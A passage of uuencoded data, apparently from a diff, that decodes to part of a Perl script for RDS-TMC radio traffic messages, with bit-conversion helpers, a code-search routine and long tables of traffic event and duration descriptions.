+M/2`D4D]!7TQ#1#L*("`@("`@("`D<&]I;G1[)$Q#1'U[)U-%1U],0T0G?2`@
+M/2`D4T5'7TQ#1#L*("`@("`@("`D8V]U;G0K*SL*("`@('T*("`@('!R:6YT
+M("(D8V]U;G0@96YT<FEE<UQN(CL@)&-O=6YT(#T@,#L*("`@('!R:6YT(")D
+M;VYE+EQN7&XB.PI]"@IS=6(@8FEN,FAE>"!["B`@("!R971U<FX@=6YP86-K
+M*")(*B(L('!A8VLH(D(J(BP@)%];,%TI*3L*?0H*<W5B(&AE>#)B:6X@>PH@
+M("`@<F5T=7)N('5N<&%C:R@B0BHB+"!P86-K*")(*B(L("1?6S!=*2D["GT*
+M"G-U8B!B:6XR9&5C('L*("`@(')E='5R;B!U;G!A8VLH(DXB+"!P86-K*")"
+M,S(B+"!S=6)S='(H(C`B('@@,S(@+B`D7ULP72P@+3,R*2DI.PI]"@IS=6(@
+M9&5C,F)I;B!["B`@("!M>2`D<W1R(#T@=6YP86-K*")",S(B+"!P86-K*").
+M(BP@)%];,%TI*3L*("`@("1S='(@/7X@<R]>,"LH/SU<9"DO+SL*("`@(')E
+M='5R;B`D<W1R.PI]"@IS=6(@<&ES96%R8V@@>PH*("`@(&UY("1S=')I;F<[
+M"B`@("!M>2`E:&%S:#L*("`@(&UY("1I(#T@,#L*"B`@("!O<&5N*$9)3$4L
+M("(\)$%21U9;,%TB*3L*"B`@("!W:&EL92@A96]F*$9)3$4I*2!["B`@("`@
+M("`@<F5A9"A&24Q%+"1S=')I;F<L,38L,"D["B`@("`@("`@)&AA<VA[)'-T
+M<FEN9WTK*SL*("`@("`@("!S965K*$9)3$4L)&DL,"D[("1I*RL["B`@("!]
+M"@H@("`@9F]R96%C:"!M>2`D:V5Y("AS;W)T('L@)&AA<VA[)&%](#P]/B`D
+M:&%S:'LD8GT@?2!K97ES("5H87-H*2![(`H@("`@("`@('!R:6YT("(D:V5Y
+M.B`D:&%S:'LD:V5Y?2`H(B`N(&)I;C)H97@H)&ME>2D@+B(I7&XB.R`*("`@
+M('T*?0H*<W5B(&EN:71?;&]O:W5P7W1A8FQE<R!["@H@("`@(R!C:&%R86-T
+M97)S('1A8FQE("AY97,@=V4@;&EK92!B:6YA<GDI"@H@("`@)&-H87)[)S`P
+M,3`G?7LG,#`P,"=](#T@(B`B.R`D8VAA<GLG,#`Q,"=]>R<P,3$Q)WT@/2`B
+M)R([("1C:&%R>R<P,#$P)WU[)S$Q,#`G?2`](")@(CL*("`@("1C:&%R>R<P
+M,#$P)WU[)S$Q,#$G?2`]("(M(CL@)&-H87)[)S`P,3`G?7LG,3$Q,"=](#T@
+M(BXB.R`D8VAA<GLG,#`Q,"=]>R<Q,3$Q)WT@/2`B+R(["B`@("`*("`@("1C
+M:&%R>R<P,#$Q)WU[)S`P,#`G?2`]("(P(CL@)&-H87)[)S`P,3$G?7LG,#`P
+M,2=](#T@(C$B.R`D8VAA<GLG,#`Q,2=]>R<P,#$P)WT@/2`B,B(["B`@("`D
+M8VAA<GLG,#`Q,2=]>R<P,#$Q)WT@/2`B,R([("1C:&%R>R<P,#$Q)WU[)S`Q
+M,#`G?2`]("(T(CL@)&-H87)[)S`P,3$G?7LG,#$P,2=](#T@(C4B.PH@("`@
+M)&-H87)[)S`P,3$G?7LG,#$Q,"=](#T@(C8B.R`D8VAA<GLG,#`Q,2=]>R<P
+M,3$Q)WT@/2`B-R([("1C:&%R>R<P,#$Q)WU[)S$P,#`G?2`]("(X(CL*("`@
+M("1C:&%R>R<P,#$Q)WU[)S$P,#$G?2`]("(X(CL@)&-H87)[)S`P,3$G?7LG
+M,3`Q,"=](#T@(CHB.R`D8VAA<GLG,#`Q,2=]>R<Q,#$Q)WT@/2`B.R(["B`@
+M("`D8VAA<GLG,#`Q,2=]>R<Q,3`P)WT@/2`B/"([("1C:&%R>R<P,#$Q)WU[
+M)S$Q,#$G?2`]("(](CL@)&-H87)[)S`P,3$G?7LG,3$Q,"=](#T@(CXB.PH@
+M("`@)&-H87)[)S`P,3$G?7LG,3$Q,2=](#T@(C\B.R`*"B`@("`D8VAA<GLG
+M,#$P,"=]>R<P,#`P)WT@/2`B0"([("1C:&%R>R<P,3`P)WU[)S`P,#$G?2`]
+M(")!(CL@)&-H87)[)S`Q,#`G?7LG,#`Q,"=](#T@(D(B.PH@("`@)&-H87)[
+M)S`Q,#`G?7LG,#`Q,2=](#T@(D,B.R`D8VAA<GLG,#$P,"=]>R<P,3`P)WT@
+M/2`B1"([("1C:&%R>R<P,3`P)WU[)S`Q,#$G?2`](")%(CL*("`@("1C:&%R
+M>R<P,3`P)WU[)S`Q,3`G?2`](")&(CL@)&-H87)[)S`Q,#`G?7LG,#$Q,2=]
+M(#T@(D<B.R`D8VAA<GLG,#$P,"=]>R<Q,#`P)WT@/2`B2"(["B`@("`D8VAA
+M<GLG,#$P,"=]>R<Q,#`Q)WT@/2`B22([("1C:&%R>R<P,3`P)WU[)S$P,3`G
+M?2`](")*(CL@)&-H87)[)S`Q,#`G?7LG,3`Q,2=](#T@(DLB.PH@("`@)&-H
+M87)[)S`Q,#`G?7LG,3$P,"=](#T@(DPB.R`D8VAA<GLG,#$P,"=]>R<Q,3`Q
+M)WT@/2`B32([("1C:&%R>R<P,3`P)WU[)S$Q,3`G?2`](").(CL*("`@("1C
+M:&%R>R<P,3`P)WU[)S$Q,3$G?2`](")/(CL@"@H@("`@)&-H87)[)S`Q,#$G
+M?7LG,#`P,"=](#T@(E`B.R`D8VAA<GLG,#$P,2=]>R<P,#`Q)WT@/2`B42([
+M("1C:&%R>R<P,3`Q)WU[)S`P,3`G?2`](")2(CL*("`@("1C:&%R>R<P,3`Q
+M)WU[)S`P,3$G?2`](")3(CL@)&-H87)[)S`Q,#$G?7LG,#$P,"=](#T@(E0B
+M.R`D8VAA<GLG,#$P,2=]>R<P,3`Q)WT@/2`B52(["B`@("`D8VAA<GLG,#$P
+M,2=]>R<P,3$P)WT@/2`B5B([("1C:&%R>R<P,3`Q)WU[)S`Q,3$G?2`](")7
+M(CL@)&-H87)[)S`Q,#$G?7LG,3`P,"=](#T@(E@B.PH@("`@)&-H87)[)S`Q
+M,#$G?7LG,3`P,2=](#T@(EDB.R`D8VAA<GLG,#$P,2=]>R<Q,#$P)WT@/2`B
+M6B([("1C:&%R>R<P,3`Q)WU[)S$P,3$G?2`](");(CL*"B`@("`C($1U<F%T
+M:6]N(&-O9&4*(`H@("`@)$106S!=(#T@(FYO(&5X<&QI8VET(&1U<F%T:6]N
+M(&=I=F5N(CL@)$106S%=(#T@(C$U(&UI;G5T97,B.R`D1%!;,ET@/2`B,S`@
+M;6EN=71E<R([("1$4%LS72`]("(Q(&AO=7(B.PH@("`@)$106S1=(#T@(C(@
+M:&]U<G,B.R`@("`@("`@("`@("`@("`@("`@)$106S5=(#T@(C,@:&]U<G,B
+M.R`@("`D1%!;-ET@/2`B-"!H;W5R<R([("`@("1$4%LW72`](")A;&P@9&%Y
+M(CL*("`@(`H@("`@(R!$:7)E8W1I;VX*("`@(`H@("`@)%!.6S!=(#T@(BLB
+M.PH@("`@)%!.6S%=(#T@(BTB.PH@("`@"B`@("`C($5V96YT(&-O9&5S"@H@
+M("`@)$5V96YT6S%=("`@(#T@(G1R869F:6,@<')O8FQE;2(["B`@("`D179E
+M;G1;,ET@("`@/2`B<75E=6EN9R!T<F%F9FEC("AW:71H(&%V97)A9V4@<W!E
+M961S(%$I+B!$86YG97(@;V8@<W1A=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%
+M=F5N=%LQ,5T@("`](")O=F5R:&5I9VAT('=A<FYI;F<@<WES=&5M('1R:6=G
+M97)E9"(["B`@("`D179E;G1;,3)=("`@/2`B*%$I(&%C8VED96YT*',I+"!T
+M<F%F9FEC(&)E:6YG(&1I<F5C=&5D(&%R;W5N9"!A8V-I9&5N="!A<F5A(CL*
+M("`@("1%=F5N=%LQ-ET@("`](")C;&]S960L(')E<V-U92!A;F0@<F5C;W9E
+M<GD@=V]R:R!I;B!P<F]G<F5S<R(["B`@("`D179E;G1;,C!=("`@/2`B<V5R
+M=FEC92!A<F5A(&]V97)C<F]W9&5D+"!D<FEV92!T;R!A;F]T:&5R('-E<G9I
+M8V4@87)E82(["B`@("`D179E;G1;,C)=("`@/2`B<V5R=FEC92!A<F5A+"!F
+M=65L('-T871I;VX@8VQO<V5D(CL*("`@("1%=F5N=%LR,UT@("`](")S97)V
+M:6-E(&%R96$L(')E<W1A=7)A;G0@8VQO<V5D(CL*("`@("1%=F5N=%LR-%T@
+M("`](")B<FED9V4@8VQO<V5D(CL*("`@("1%=F5N=%LR-5T@("`](")T=6YN
+M96P@8VQO<V5D(CL*("`@("1%=F5N=%LR-ET@("`](")B<FED9V4@8FQO8VME
+M9"(["B`@("`D179E;G1;,C==("`@/2`B='5N;F5L(&)L;V-K960B.PH@("`@
+M)$5V96YT6S(X72`@(#T@(G)O860@8VQO<V5D(&EN=&5R;6ET=&5N=&QY(CL*
+M("`@("1%=F5N=%LS-ET@("`](")F=65L('-T871I;VX@<F5O<&5N960B.PH@
+M("`@)$5V96YT6S,W72`@(#T@(G)E<W1A=7)A;G0@<F5O<&5N960B.PH@("`@
+M)$5V96YT6S0P72`@(#T@(G-M;V<@86QE<G0@96YD960B.PH@("`@)$5V96YT
+M6S0Q72`@(#T@(BA1*2!O=F5R=&%K:6YG(&QA;F4H<RD@8VQO<V5D(CL*("`@
+M("1%=F5N=%LT,ET@("`]("(H42D@;W9E<G1A:VEN9R!L86YE*',I(&)L;V-K
+M960B.PH@("`@)$5V96YT6S4Q72`@(#T@(G)O861W;W)K<RP@*%$I(&]V97)T
+M86MI;F<@;&%N92AS*2!C;&]S960B.PH@("`@)$5V96YT6S4R72`@(#T@(BA1
+M('-E=',@;V8I(')O861W;W)K<R!O;B!T:&4@:&%R9"!S:&]U;&1E<B(["B`@
+M("`D179E;G1;-3-=("`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS(&EN('1H
+M92!E;65R9V5N8WD@;&%N92(["B`@("`D179E;G1;-35=("`@/2`B=')A9F9I
+M8R!P<F]B;&5M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LU-ET@("`](")T<F%F
+M9FEC(&-O;F=E<W1I;VX@97AP96-T960B.PH@("`@)$5V96YT6S4W72`@(#T@
+M(FYO<FUA;"!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N=%LV,5T@("`]
+M("(H42D@;V)J96-T*',I(&]N(')O861W87D@>W-O;65T:&EN9R!T:&%T(&1O
+M97,@;F]T(&YE8V-E<W-A<FEL>2!B;&]C:R!T:&4@<F\B.PH@("`@)$5V96YT
+M6S8R72`@(#T@(BA1*2!B=7)S="!P:7!E*',I(CL*("`@("1%=F5N=%LV,UT@
+M("`]("(H42D@;V)J96-T*',I(&]N('1H92!R;V%D+B!$86YG97(B.PH@("`@
+M)$5V96YT6S8T72`@(#T@(F)U<G-T('!I<&4N($1A;F=E<B(["B`@("`D179E
+M;G1;-S!=("`@/2`B=')A9F9I8R!C;VYG97-T:6]N+"!A=F5R86=E('-P965D
+M(&]F(&MM+V@B.PH@("`@)$5V96YT6S<Q72`@(#T@(G1R869F:6,@8V]N9V5S
+M=&EO;BP@879E<F%G92!S<&5E9"!O9B!K;2]H(CL*("`@("1%=F5N=%LW,ET@
+M("`](")T<F%F9FEC(&-O;F=E<W1I;VXL(&%V97)A9V4@<W!E960@;V8@:VTO
+M:"(["B`@("`D179E;G1;-S-=("`@/2`B=')A9F9I8R!C;VYG97-T:6]N+"!A
+M=F5R86=E('-P965D(&]F(&MM+V@B.PH@("`@)$5V96YT6S<T72`@(#T@(G1R
+M869F:6,@8V]N9V5S=&EO;BP@879E<F%G92!S<&5E9"!O9B!K;2]H(CL*("`@
+M("1%=F5N=%LW-5T@("`](")T<F%F9FEC(&-O;F=E<W1I;VXL(&%V97)A9V4@
+M<W!E960@;V8@:VTO:"(["B`@("`D179E;G1;-S9=("`@/2`B=')A9F9I8R!C
+M;VYG97-T:6]N+"!A=F5R86=E('-P965D(&]F(&MM+V@B.PH@("`@)$5V96YT
+M6SDQ72`@(#T@(F1E;&%Y<R`H42D@9F]R(&-A<G,B.PH@("`@)$5V96YT6S$P
+M,5T@(#T@(G-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,3`R72`@
+M/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;,3`S
+M72`@/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;
+M,3`T72`@/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,3`U72`@/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D
+M179E;G1;,3`V72`@/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@
+M("`D179E;G1;,3`W72`@/2`B<W1A=&EO;F%R>2!T<F%F9FEC(&5X<&5C=&5D
+M(CL*("`@("1%=F5N=%LQ,#A=("`](")Q=65U:6YG('1R869F:6,@*'=I=&@@
+M879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V96YT6S$P.5T@(#T@(G%U975I
+M;F<@=')A9F9I8R!F;W(@:VT@*'=I=&@@879E<F%G92!S<&5E9',@42DB.PH@
+M("`@)$5V96YT6S$Q,%T@(#T@(G%U975I;F<@=')A9F9I8R!F;W(@:VT@*'=I
+M=&@@879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V96YT6S$Q,5T@(#T@(G%U
+M975I;F<@=')A9F9I8R!F;W(@:VT@*'=I=&@@879E<F%G92!S<&5E9',@42DB
+M.PH@("`@)$5V96YT6S$Q,ET@(#T@(G%U975I;F<@=')A9F9I8R!F;W(@:VT@
+M*'=I=&@@879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V96YT6S$Q,UT@(#T@
+M(G%U975I;F<@=')A9F9I8R!F;W(@:VT@*'=I=&@@879E<F%G92!S<&5E9',@
+M42DB.PH@("`@)$5V96YT6S$Q-%T@(#T@(G%U975I;F<@=')A9F9I8R!E>'!E
+M8W1E9"(["B`@("`D179E;G1;,3$U72`@/2`B<VQO=R!T<F%F9FEC("AW:71H
+M(&%V97)A9V4@<W!E961S(%$I(CL*("`@("1%=F5N=%LQ,39=("`](")S;&]W
+M('1R869F:6,@9F]R(&MM("AW:71H(&%V97)A9V4@<W!E961S(%$I(CL*("`@
+M("1%=F5N=%LQ,3==("`](")S;&]W('1R869F:6,@9F]R(&MM("AW:71H(&%V
+M97)A9V4@<W!E961S(%$I(CL*("`@("1%=F5N=%LQ,3A=("`](")S;&]W('1R
+M869F:6,@9F]R(&MM("AW:71H(&%V97)A9V4@<W!E961S(%$I(CL*("`@("1%
+M=F5N=%LQ,3E=("`](")S;&]W('1R869F:6,@9F]R(&MM("AW:71H(&%V97)A
+M9V4@<W!E961S(%$I(CL*("`@("1%=F5N=%LQ,C!=("`](")S;&]W('1R869F
+M:6,@9F]R(&MM("AW:71H(&%V97)A9V4@<W!E961S(%$I(CL*("`@("1%=F5N
+M=%LQ,C%=("`](")S;&]W('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT
+M6S$R,ET@(#T@(FAE879Y('1R869F:6,@*'=I=&@@879E<F%G92!S<&5E9',@
+M42DB.PH@("`@)$5V96YT6S$R,UT@(#T@(FAE879Y('1R869F:6,@97AP96-T
+M960B.PH@("`@)$5V96YT6S$R-%T@(#T@(G1R869F:6,@9FQO=VEN9R!F<F5E
+M;'D@*'=I=&@@879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V96YT6S$R-5T@
+M(#T@(G1R869F:6,@8G5I;&1I;F<@=7`@*'=I=&@@879E<F%G92!S<&5E9',@
+M42DB.PH@("`@)$5V96YT6S$R-ET@(#T@(FYO('!R;V)L96US('1O(')E<&]R
+M="(["B`@("`D179E;G1;,3(W72`@/2`B=')A9F9I8R!C;VYG97-T:6]N(&-L
+M96%R960B.PH@("`@)$5V96YT6S$R.%T@(#T@(FUE<W-A9V4@8V%N8V5L;&5D
+M(CL*("`@("1%=F5N=%LQ,CE=("`](")S=&%T:6]N87)Y('1R869F:6,@9F]R
+M(&MM(CL*("`@("1%=F5N=%LQ,S!=("`](")D86YG97(@;V8@<W1A=&EO;F%R
+M>2!T<F%F9FEC(CL*("`@("1%=F5N=%LQ,S%=("`](")Q=65U:6YG('1R869F
+M:6,@9F]R(&MM("AW:71H(&%V97)A9V4@<W!E961S(%$I(CL*("`@("1%=F5N
+M=%LQ,S)=("`](")D86YG97(@;V8@<75E=6EN9R!T<F%F9FEC("AW:71H(&%V
+M97)A9V4@<W!E961S(%$I(CL*("`@("1%=F5N=%LQ,S-=("`](")L;VYG('%U
+M975E<R`H=VET:"!A=F5R86=E('-P965D<R!1*2(["B`@("`D179E;G1;,3,T
+M72`@/2`B<VQO=R!T<F%F9FEC(&9O<B!K;2`H=VET:"!A=F5R86=E('-P965D
+M<R!1*2(["B`@("`D179E;G1;,3,U72`@/2`B=')A9F9I8R!E87-I;F<B.PH@
+M("`@)$5V96YT6S$S-ET@(#T@(G1R869F:6,@8V]N9V5S=&EO;B`H=VET:"!A
+M=F5R86=E('-P965D<R!1*2(["B`@("`D179E;G1;,3,W72`@/2`B=')A9F9I
+M8R!L:6=H=&5R('1H86X@;F]R;6%L("AW:71H(&%V97)A9V4@<W!E961S(%$I
+M(CL*("`@("1%=F5N=%LQ,SA=("`](")Q=65U:6YG('1R869F:6,@*'=I=&@@
+M879E<F%G92!S<&5E9',@42DN($%P<')O86-H('=I=&@@8V%R92(["B`@("`D
+M179E;G1;,3,Y72`@/2`B<75E=6EN9R!T<F%F9FEC(&%R;W5N9"!A(&)E;F0@
+M:6X@=&AE(')O860B.PH@("`@)$5V96YT6S$T,%T@(#T@(G%U975I;F<@=')A
+M9F9I8R!O=F5R('1H92!C<F5S="!O9B!A(&AI;&PB.PH@("`@)$5V96YT6S$T
+M,5T@(#T@(F%L;"!A8V-I9&5N=',@8VQE87)E9"P@;F\@<')O8FQE;7,@=&\@
+M<F5P;W)T(CL*("`@("1%=F5N=%LQ-#)=("`](")T<F%F9FEC(&AE879I97(@
+M=&AA;B!N;W)M86P@*'=I=&@@879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V
+M96YT6S$T,UT@(#T@(G1R869F:6,@=F5R>2!M=6-H(&AE879I97(@=&AA;B!N
+M;W)M86P@*'=I=&@@879E<F%G92!S<&5E9',@42DB.PH@("`@)$5V96YT6S(P
+M,%T@(#T@(FUU;'1I('9E:&EC;&4@<&EL92!U<"X@1&5L87ES("A1*2(["B`@
+M("`D179E;G1;,C`Q72`@/2`B*%$I(&%C8VED96YT*',I(CL*("`@("1%=F5N
+M=%LR,#)=("`]("(H42D@<V5R:6]U<R!A8V-I9&5N="AS*2(["B`@("`D179E
+M;G1;,C`S72`@/2`B;75L=&DM=F5H:6-L92!A8V-I9&5N="`H:6YV;VQV:6YG
+M(%$@=F5H:6-L97,I(CL*("`@("1%=F5N=%LR,#1=("`](")A8V-I9&5N="!I
+M;G9O;'9I;F<@*&$O42D@:&5A=GD@;&]R<BAY+VEE<RDB.PH@("`@)$5V96YT
+M6S(P-5T@(#T@(BA1*2!A8V-I9&5N="AS*2!I;G9O;'9I;F<@:&%Z87)D;W5S
+M(&UA=&5R:6%L<R(["B`@("`D179E;G1;,C`V72`@/2`B*%$I(&9U96P@<W!I
+M;&QA9V4@86-C:61E;G0H<RDB.PH@("`@)$5V96YT6S(P-UT@(#T@(BA1*2!C
+M:&5M:6-A;"!S<&EL;&%G92!A8V-I9&5N="AS*2(["B`@("`D179E;G1;,C`X
+M72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A8V-I9&5N
+M="AS*2(["B`@("`D179E;G1;,C`Y72`@/2`B*%$I(&%C8VED96YT*',I(&EN
+M('1H92!O<'!O<VEN9R!L86YE<R(["B`@("`D179E;G1;,C$P72`@/2`B*%$I
+M('-H960@;&]A9"AS*2(["B`@("`D179E;G1;,C$Q72`@/2`B*%$I(&)R;VME
+M;B!D;W=N('9E:&EC;&4H<RDB.PH@("`@)$5V96YT6S(Q,ET@(#T@(BA1*2!B
+M<F]K96X@9&]W;B!H96%V>2!L;W)R*'DO:65S*2(["B`@("`D179E;G1;,C$S
+M72`@/2`B*%$I('9E:&EC;&4@9FER92AS*2(["B`@("`D179E;G1;,C$T72`@
+M/2`B*%$I(&EN8VED96YT*',I(CL*("`@("1%=F5N=%LR,35=("`]("(H42D@
+M86-C:61E;G0H<RDN(%-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;
+M,C$V72`@/2`B*%$I(&%C8VED96YT*',I+B!3=&%T:6]N87)Y('1R869F:6,@
+M9F]R(&MM(CL*("`@("1%=F5N=%LR,3==("`]("(H42D@86-C:61E;G0H<RDN
+M(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(Q.%T@
+M(#T@(BA1*2!A8V-I9&5N="AS*2X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K
+M;2(["B`@("`D179E;G1;,C$Y72`@/2`B*%$I(&%C8VED96YT*',I+B!3=&%T
+M:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR,C!=("`]("(H
+M42D@86-C:61E;G0H<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@
+M("`@)$5V96YT6S(R,5T@(#T@(BA1*2!A8V-I9&5N="AS*2X@1&%N9V5R(&]F
+M('-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,C(R72`@/2`B*%$I
+M(&%C8VED96YT*',I+B!1=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S(R
+M,UT@(#T@(BA1*2!A8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K
+M;2(["B`@("`D179E;G1;,C(T72`@/2`B*%$I(&%C8VED96YT*',I+B!1=65U
+M:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR,C5=("`]("(H42D@
+M86-C:61E;G0H<RDN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V
+M96YT6S(R-ET@(#T@(BA1*2!A8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;,C(W72`@/2`B*%$I(&%C8VED96YT*',I
+M+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR,CA=("`]
+M("(H42D@86-C:61E;G0H<RDN($1A;F=E<B!O9B!Q=65U:6YG('1R869F:6,B
+M.PH@("`@)$5V96YT6S(R.5T@(#T@(BA1*2!A8V-I9&5N="AS*2X@4VQO=R!T
+M<F%F9FEC(CL*("`@("1%=F5N=%LR,S!=("`]("(H42D@86-C:61E;G0H<RDN
+M(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(S,5T@(#T@(BA1
+M*2!A8V-I9&5N="AS*2X@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C,R72`@/2`B*%$I(&%C8VED96YT*',I+B!3;&]W('1R869F:6,@9F]R
+M(&MM(CL*("`@("1%=F5N=%LR,S-=("`]("(H42D@86-C:61E;G0H<RDN(%-L
+M;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(S-%T@(#T@(BA1*2!A
+M8V-I9&5N="AS*2X@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;
+M,C,U72`@/2`B*%$I(&%C8VED96YT*',I+B!3;&]W('1R869F:6,@97AP96-T
+M960B.PH@("`@)$5V96YT6S(S-ET@(#T@(BA1*2!A8V-I9&5N="AS*2X@2&5A
+M=GD@=')A9F9I8R(["B`@("`D179E;G1;,C,W72`@/2`B*%$I(&%C8VED96YT
+M*',I+B!(96%V>2!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N=%LR,SA=
+M("`]("(H42D@86-C:61E;G0H<RDN(%1R869F:6,@9FQO=VEN9R!F<F5E;'DB
+M.PH@("`@)$5V96YT6S(S.5T@(#T@(BA1*2!A8V-I9&5N="AS*2X@5')A9F9I
+M8R!B=6EL9&EN9R!U<"(["B`@("`D179E;G1;,C0P72`@/2`B<F]A9"!C;&]S
+M960@9'5E('1O("A1*2!A8V-I9&5N="AS*2(["B`@("`D179E;G1;,C0Q72`@
+M/2`B*%$I(&%C8VED96YT*',I+B!2:6=H="!L86YE(&)L;V-K960B.PH@("`@
+M)$5V96YT6S(T,ET@(#T@(BA1*2!A8V-I9&5N="AS*2X@0V5N=')E(&QA;F4@
+M8FQO8VME9"(["B`@("`D179E;G1;,C0S72`@/2`B*%$I(&%C8VED96YT*',I
+M+B!,969T(&QA;F4@8FQO8VME9"(["B`@("`D179E;G1;,C0T72`@/2`B*%$I
+M(&%C8VED96YT*',I+B!(87)D('-H;W5L9&5R(&)L;V-K960B.PH@("`@)$5V
+M96YT6S(T-5T@(#T@(BA1*2!A8V-I9&5N="AS*2X@5'=O(&QA;F5S(&)L;V-K
+M960B.PH@("`@)$5V96YT6S(T-ET@(#T@(BA1*2!A8V-I9&5N="AS*2X@5&AR
+M964@;&%N97,@8FQO8VME9"(["B`@("`D179E;G1;,C0W72`@/2`B86-C:61E
+M;G0N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S(T.%T@(#T@(F%C8VED96YT
+M+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LR-#E=("`](")A
+M8V-I9&5N="X@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LR-3!=("`]
+M(")V96AI8VQE<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I
+M+B!3=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S(U,5T@(#T@(G9E
+M:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H<RDN(%-T
+M871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(U,ET@(#T@
+M(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H<RDN
+M(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(U,UT@
+M(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H
+M<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(U
+M-%T@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E
+M;G0H<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT
+M6S(U-5T@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C
+M:61E;G0H<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V
+M96YT6S(U-ET@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@
+M86-C:61E;G0H<RDN($1A;F=E<B!O9B!S=&%T:6]N87)Y('1R869F:6,B.PH@
+M("`@)$5V96YT6S(U-UT@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A
+M="`H42D@86-C:61E;G0H<RDN(%%U975I;F<@=')A9F9I8R(["B`@("`D179E
+M;G1;,C4X72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C4Y72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C8P72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C8Q72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C8R72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,C8S72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1*2!A
+M8V-I9&5N="AS*2X@1&%N9V5R(&]F('%U975I;F<@=')A9F9I8R(["B`@("`D
+M179E;G1;,C8T72`@/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T("A1
+M*2!A8V-I9&5N="AS*2X@4VQO=R!T<F%F9FEC(CL*("`@("1%=F5N=%LR-C5=
+M("`](")V96AI8VQE<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT
+M*',I+B!3;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR-C9=("`]
+M(")V96AI8VQE<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I
+M+B!3;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR-C==("`](")V
